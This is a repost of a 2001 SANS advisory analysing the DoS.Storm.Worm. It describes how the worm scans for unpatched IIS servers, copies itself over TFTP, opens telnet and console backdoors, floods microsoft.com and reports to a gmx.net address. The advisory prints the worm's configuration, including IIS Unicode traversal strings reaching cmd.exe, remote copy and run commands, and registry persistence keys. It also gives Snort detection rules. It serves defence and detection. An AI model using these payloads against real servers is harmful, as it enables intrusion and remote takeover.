DOS.STORM.WORM Technical Analysis by SANS

posted onJune 13, 2001
by hitbsecnews

DESCRIPTION
DoS.Storm.Worm is a worm that seeks out Microsoft Internet Information Services (IIS) systems that have not applied the proper security patches. Any such systems that it finds are then infected with the worm. The payload of this worm performs a denial of service attack on http:/ /www.microsoft.com 1(http://www.symantec.com/avcenter/venc/data/dos.storm.worm.html)

It is packed using upx packer and is written in Java.

the main 'wrapper' class is 'runner.class'. It starts
the various pieces.

1. read 'datastore'
'datastore' is a class that is handed along and carries
a number of configuration parameters. When 'datastore'
is first instantiated, it looks for 'storm.cfg' and
overwrites any default parameters with values with
values it finds in storm.cfg. A new storm.cfg is
written if it doesn't exist.

I appended the block with default parameters at the end.

if the value 'debug' is set to 'true', extra logging
will be enabled.

2. send e-mail to 'emailreceive' (@gmx.net)
The body of the e-mail is one line listing the
host name and IP address of the infected machine followed
by the word 'startup.'

(see #A below for discussion of 'mailer')

3. setup tftpd.
this will setup a tftpd daemon on port 69.

4. start 'scanner'.
this part scans hosts for a variety of strings to a web server.
First, the version id is queried to check if the server runs
IIS (see the datastore strings).
The strings are listed in 'datastore' and start with 'v'
(e.g. v1, v2 ...) the return value is compated to the 'r' strings
(r1, r2) in datastore.

For vulnerable hosts, the 'installer' will then try and install
(and start) storm on the new machine. See the 'copy' and 'start'
variables in datastore. The installer verifies that the new copy is
running.

5. start 'telnetd'
start a telnet server at the port given by 'telnetport' in
datastore (default 23001). the username and password are given in
'user' and 'pwd'

6. start 'dosd'
dosd accesses each URL listed in datastore variables starting
with 'dos'. By default, this is 'http://www.microsoft.com'

7. start 'bombd'
send an e-mail to each address listed in datastore with
variable name starting with 'bomb' (e.g. bomb1). by default
gates@microsoft.com. The text of the message is in 'bombtext'

8. start consoled
concole on port 23000 (or 'consoleport'). Same username password
as telnetd.
looks like this can be used to remotly configure storm and
overwrite various parameters in datastore (e.g. smtp things...)

9. modify register.
all 'datastore' variables that start with 'register' are additions
to the system registry. by default, only two are used
'register1' and 'register2' to start storm on reboot.

A. 'mailer'

mailer sends an email the SMTP server specified in datastore
(by default: mail.gmx.net). It uses a username/password to
authenticate itself.

--- default parameters from 'datastore.class' ---
banner=*********************** Storm (c) Agberd Celine 2000
***********************
version=Storm v1.0
installed=?/c+tftp.exe+
extract=?/c+storm.exe+
run=?/c+c:winntsystem32stormstart.bat
extractresult=CGI
runresult=started.
smtp=mail.gmx.net
host=replacer
ttl=10000000
tftpdir=c:winntsystem32storm
telnetport=23001
consoleport=23000
dos1=http://www.microsoft.com
copy=?/c+copy+storm.exe+c:winntsystem32storm
copyresult=CGI
bomb1=gates@microsoft.com
bombtext=Fuck you!
check=?/c+dir
v1=/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe
v2=/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe
v3=/scripts/..%c1%1c../..%c1%1c../mssql7/install/pubtext.bat+&+cmd.exe/msadc
/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe=installedresult
r1=c:
r2=d:
r3=e:
r4=C:
r5=D:
r6=E:
s1=Server:Microsoft-IIS/4.0
s2=Server:Microsoft-IIS/5.0
regiater1=HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
CurrentVersionRunService666=c:winntsystem32stormstart.bat
register2=HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
CurrentVersionRun666=c:winntsystem32stormstart.bat
shell=cmd.exe
systemlog1=Systemlog

DETECTION
Snort will pick up the probes to iis with this rule that is available from whitehats.com
and snort.org

http://www.whitehats.com/cgi/arachNIDS/Show?_id=ids452&view=signatures

alert TCP $EXTERNAL any -> $INTERNAL 80 (msg:
"IDS452/web-iis_http-iis-unicode-binary"; flags: A+; content:
"..|c0af|"; nocase;)

http://www.whitehats.com/cgi/arachNIDS/Show?_id=ids432&view=signatures

alert TCP $EXTERNAL any -> $INTERNAL 80 (msg:
"IDS432/web-iis_http-iis-unicode-traversal"; flags: A+; content:
"..|25|c1|25|1c"; nocase;)

http://www.snort.org

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-MISC Attempt to execute
cmd"; flags: A+; content:"cmd.exe"; nocase;)

REMOVAL
Symantec antivirus is able to detect and they provide how to clean your system:
http://www.symantec.com/avcenter/venc/data/dos.storm.worm.html

REFERENCES
http://www.incidents.org/
http://www.symantec.com/avcenter/venc/data/dos.storm.worm.html
http://www.incidents.org/react/unicode.php

CREDITS
This security advisory was prepared by Matt Fearnow of the SANS Institute and Johannes
Ullrich of the SANS Institute.
Also contributing efforts go to Lenny Zeltser and NIPC Labs.

MIRROR
This write up can be found at:
http://www.incidents.org/react/dosstormworm.php.

Source

Tags

Audio/Video

You May Also Like

Other Articles In This Section

Recent News

Tuesday, July 9th

China's APT40 gang is ready to attack vulns within hours or days of public release
AI-Powered Super Soldiers Are More Than Just a Pipe Dream
The president ordered a board to probe a massive Russian cyberattack. It never did.
Massive car dealer ransom attack is mostly over after 2 weeks of work-arounds

Wednesday, July 3rd

“RegreSSHion” vulnerability in OpenSSH gives attackers root on Linux
Two of the German military’s new spy satellites appear to have failed in orbit

Friday, June 28th

Indonesian Airports, Data Centres Hit By Worst Cyberattack in Years
Cisco Talos warns of wider security implications following Snowflake breach

Thursday, June 27th

I Wore Meta Ray-Bans in Montreal to Test Their AI Translation Skills. It Did Not Go Well
Researchers upend AI status quo by eliminating matrix multiplication in LLMs
YouTube tries convincing record labels to license music for AI song generator
Critical MOVEit vulnerability puts huge swaths of the Internet at severe risk
Julian Assange to plead guilty but is going home after long extradition fight

Thursday, June 13th

Hackers show off jailbroken checkm8-vulnerable iPad and Apple TV running iPadOS 18 & tvOS 18 respectively
One of the major sellers of detailed driver behavioral data is shutting down
Turkish student creates custom AI device for cheating university exam, gets arrested

Wednesday, June 12th

Chinese-Made Biometric Access System Has 24 Vulnerabilities
Apple and OpenAI currently have the most misunderstood partnership in tech
Adobe to update vague AI terms after users threaten to cancel subscriptions
China state hackers infected 20,000 Fortinet VPNs

Tuesday, June 11th

Russia Is Targeting Germany With Fake Information as Europe Votes
Apple announces macOS 15 Sequoia with window tiling, iPhone mirroring, and more
Apple integrates ChatGPT into Siri, iOS, and macOS
British police to scan 480,000 Formula 1 fans’ faces at Silverstone
Hackers steal “significant volume” of data from hundreds of Snowflake customers

Friday, June 7th

7,000 LockBit decryption keys now in the hands of the FBI, offering victims hope
FCC pushes ISPs to fix security flaws in Internet routing
Can a technology called RAG keep AI models from making stuff up?
How to Lead an Army of Digital Sleuths in the Age of AI

Thursday, June 6th

Mystery object waits nearly an hour between radio bursts
Apple refused to pay bug bounty to Russian cybersecurity firm Kaspersky Lab
Ex-Microsoft security expert torches Windows' new 'Recall' feature
The Age of the Drone Police Is Here

Wednesday, June 5th

Ukrainian Systems Hit by Cobalt Strike Via a Malicious Excel File
TikTok Hack Targets ‘High-Profile’ Users via DMs